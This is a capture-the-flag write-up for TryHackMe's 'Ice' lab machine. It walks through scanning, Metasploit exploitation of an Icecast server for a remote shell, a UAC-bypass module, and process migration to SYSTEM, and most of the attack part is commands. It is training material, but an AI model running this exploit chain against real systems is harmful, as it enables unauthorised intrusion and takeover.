TryHackMe – Ice Writeup

Table Of Contents
TryHackMe – Ice Writeup
Ice is a beginner level windows machine on tryhackme. The machine runs an Icecast Media Server on one of the ports. We exploit this service to gain a remote shell on the machine. The privilege escalation is done with bypassuas_eventvwr exploit and by exploiting the SeTakeOwnershipPrivilege to gain system on the remote machine

Connecting to HTB Vpn:
1] First download the vpn file from the access page of tryhackme
2] Open the .ovpn file in your terminal with the following command
openvpn yourname.ovpn
3] Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network
4] You can access the machine at the given ip
Scanning:
1] First let’s do a nmap scan on our target at 10.10.219.165
nmap -sV -A -p- 10.10.219.165
-sV : to get the service versions on each port
-A : to get information such as os details, traceroutes, ports etc
-p- : to scan all 65535 ports
We get the following details from our scan

Enumeration:
2] We can see an open port running icecast streaming media server, so first let’s search for any exploits related to this service using searchsploit
searchsploit icecast

Gaining Access:
3] Since there is a metasploit module, first let’s try that
msfconsole
search icecast

4] Let’s try this exploit
use 0
set rhosts 10.10.219.165
exploit

Certified Ethical Hacking
Privilege Escalation:
5] Now lets background this session(ctrl+z) and try to escalate our privileges using the local exploit suggester module in metasploit
search local_exploit_suggester
use 0
set session 2
exploit

6] Let’s try the first exploit and if it doesn’t work then the rest

use exploit/windows/local/bypassuac_eventvwr
set session 2
set lhost 10.10.13.20
exploit

7] Now let’s check what all privileges this user has
getprivs

8] We have SeTakeOwnership privilege, so let’s migrate to any process running as System
ps
migrate 816

9] Now we are System on the machine
Don’t forget to check out our latest Blogs – HackTheBox – Irked Writeup